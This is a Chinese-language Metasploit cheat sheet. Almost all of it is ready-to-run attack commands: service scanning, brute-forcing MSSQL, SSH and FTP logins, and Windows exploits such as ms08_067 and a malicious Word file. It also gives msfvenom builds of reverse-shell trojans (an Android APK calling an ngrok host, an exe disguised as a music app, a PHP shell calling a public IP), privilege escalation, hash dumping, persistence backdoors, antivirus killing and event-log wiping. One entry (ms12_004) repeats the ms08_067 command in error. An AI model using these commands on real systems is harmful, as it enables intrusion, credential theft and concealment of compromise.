常用命令
1 | search 搜索 search -f *.jpg |
漏洞扫描
检测端口服务
检测端口
1 | msf> nmap –sT –A –P0 192.168.1.130 #探测开放服务 |
检测服务
1 | msf > search portscan |
mssql开发利用
对各个ip是否有mssql服务的探测
1 | use scanner/mssql/mssql_ping //测试MSSQL的存在和信息 |
对扫描到的ip进行爆破
1 | msf> use auxiliary/scanner/mssql/mssql_login |
sa权限对其利用
1 | use admin/mssql/mssql_exec |
爆破ssh模块
1 | use auxiliary/scanner/ssh/ssh_login |
通过nmap扫描基本漏洞
1 | msf > nmap –script=vuln 受害靶机ip地址 |
445端口扫描系统信息
1 | use auxiliary/scanner/smb/smb_version |
密码嗅探
1 | use auxiliary/sniffer/psnuffle |
SNMP扫描和枚举
1 | use auxiliary/scanner/snmp/snmp_login |
VNC身份验证
1 | use auxiliary/scanner/vnc/vnc_none_auth |
FTP 主机扫描
1 | msf> use auxiliary/scanner/ftp/ftp_version |
扫描FTP 匿名登录
1 | use auxiliary/scanner/ftp/anonymos |
VNC 空口令
1 | msf> use auxiliary/scanner/vnc/vnc_none_auth |
Open X11 空口令
1 | msf> use auxiliary/scanner/x11/open_x11 |
溢出漏洞
ms08_067
1 | use exploit/windows/smb/ms08_067_netapi |
ms12_004
1 | use exploit/windows/smb/ms08_067_netapi |
ms14_002内核提权(使用于32bit)
1 | exploit/windows/local/ms_ndproxy |
设置一个选项或取消设置set/unset
设置或取消全局选项setg/unsetg 例如设置LHOST 就可以用setg,避免后面重复设置
保存全局选项的设置save 当下次启动仍然生效
使用用户端攻击方式(client-side attacks)
①主要指利用多种途径包括社会工程学方式攻击目标机器上安装的带有漏洞的程序如浏览
器,pdf 阅读器,office 软件等,最终获取系统权限。
1 | msf> use windows/browser/ms10_002_aurora |
②文件格式exploit
利用文件格式的漏洞达到溢出的目的,比如PDF,word,图片等。
例子:
1 | msf> use windows/fileformat/ms11_006_createsizeddibsection info |
此时会生成一个msf.doc 的word 文档,在目标机器上打开此文档,然后本机监听端口
等待反弹连接:
1 | use multi/handler |
Meterpreter Payload
metasploit安卓木马远控
metasploit之安卓木马结合ngrok远控
1 | msfvenom -p android/meterpreter/reverse_tcp LHOST=free.ngrok.cc LPORT=11*** R > /root/Desktop/123.apk |
meterpreter收到shell
1 | use exploit/multi/handler |
metasploit之木马生成
生成一个window木马返回shell -p window平台正向链接 -e 编码 -b 字符列表 -f 平台
1 | msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp –e x86/shikata_ga_nai -b '\x00' -f python |
两次弹框:payload
1 | msfvenom -a x86 --platform windows -p windows/messagebox TEXT=MSFU Example -f raw > messageBox |
可以生成具有网易云音乐
相同模板功能的木马exe
1 | msfvenom -a x86 --platform windows -x 1.exe -k -p windows/meterpreter/reverse_tcp LHOST=192.168.211.179 LPORT=4444 –b “\ x00” -f exe -o 2.exe |
-k 保留exe的行为 -x 指定一个文件 -p 保留模版行为 -o 保留为2.exe
metasploit之powershell
1 | use exploit/multi/script/web_delivery |
metasploit之PHP
1 | msfvenom -p php/meterpreter_reverse_tcp LHOST=60.205.212.140 LPORT=8888 -f raw > shell.php |
metasploit之shellcode
1 | msfvenom -p windows/meterpreter/reverse_tcp LPORT=1234 LHOST=60.205.212.140 -e x86/shikata_ga_nai -i 11 -f py > 1.py //-e 使用编码 -i 编码次数 |
metasploit之提权
1.getsystem
1 | meterpreter > getsystem //直getsystem提权,最常用简单的办法 |
2.使用exp提权
1 | meterpreter > background //先后台运行会话 |
注意:如果创建了一个system进程,就可以立马sessions 1
进入会话,然后ps查看进程,使用migrate pid注入到进程。
或者直接:
1 | meterpreter > run post/windows/escalate/ms10_073_kbdlayout |
3.盗取令牌
1 | meterpreter > use incognito //进入这个模块 |
注:只有具有“模仿安全令牌权限”的账户才能去模仿别人的令牌,一般大多数的服务型账户(IIS、MSSQL等)有这个权限,大多数用户级的账户没有这个权限。一般从web拿到的webshell都是IIS服务器权限,是具有这个模仿权限的,建好的账户没有这个权限。使用菜刀(IIS服务器权限)反弹meterpreter是服务型权限。
4.Bypassuac
1 | msf > use exploit/windows/local/bypassuac //32位与64位一样,其他几个模块也一样 |
5.Hash
1 | meterpreter > run post/windows/gather/smart_hashdump //读取hash这种做法最智能,效果最好。 |
6.漏洞提权的匹配
1 | use post/multi/recon/local_exploit_suggester |
建立持久后门
1.服务启动后门
1 | meterpreter > run metsvc -A //再开起一个终端,进入msfconsole |
2.persistence
1 | meterpreter > run persistence -X -i 10 -p 6666 -r 192.168.71.105 |
注意到移除 persistence 后门的办法是删除 HKLM\Software\Microsoft\Windows\CurrentVersion\Run\
中的注册表键和 C:\WINDOWS\TEMP\
中的VBScript
文件。
缺点:容易被杀毒软件杀 。
- 清除记录
1 | msf > clearev //删除目标机上的应用程序、系统和安全日志。 |
Meterpreter域渗透
添加路由
1 | meterpreter> run get_local_subnets #查看网段/子网 |
Meterpreter 脚本
1.vnc 脚本,获取远程机器vnc 界面控制
1 | meterpreter> run vnc |
2.进程迁移
1 | meterpreter> run post/windows/manage/migrate |
在64 位win7 中migrate 需要管理员权限执行后门才能成功,而migrate 前后获取的 权限是有差异的
3.关闭杀毒软件
1 | meterpreter> run killav //这个脚本要小心使用,可能导致目标机器蓝屏死机 |
4.获取系统密码hash
1 | run hashdump //64 位win7 下需要管理员权限执行后门且先getsystem,然后使用 |
5.获取系统流量数据
1 | meterpreter> run packtrecorder –i 1 |
6.获取密码,下载注册表,获取系统信息等
1 | meterpreter> run scraper |
7.持久化
1 | meterpreter> run persistence –X –i 50 –p 443 –r 192.168.1.111 |
-X 开机启动-i 连接超时时间–p 端口–rIP
8.POST 整合模块
1 | meterpreter> run post/windows/gather/hashdump |
9.升级command shell
1 | msfconsole |
10.使用Railgun 操作windows APIs
1 | meterpreter> irb |
在目标机器上会弹出一个标题栏为world 和内容为hello 的窗口
Metasploit结合Nmap(lua语言)
1 | nmap -sS -p 3389 -oG- 221.0.90.0/24 | grep open 显示3389端口开放的主机 |
漏洞银行
1 | nmap --script=struts_02-045.nse --script-args filename=***.jsp 192.168.211.137 查看某个网页有没有shell |
嘶吼
1 | cd /usr/share/nmap/scripts/ Nmap脚本目录 |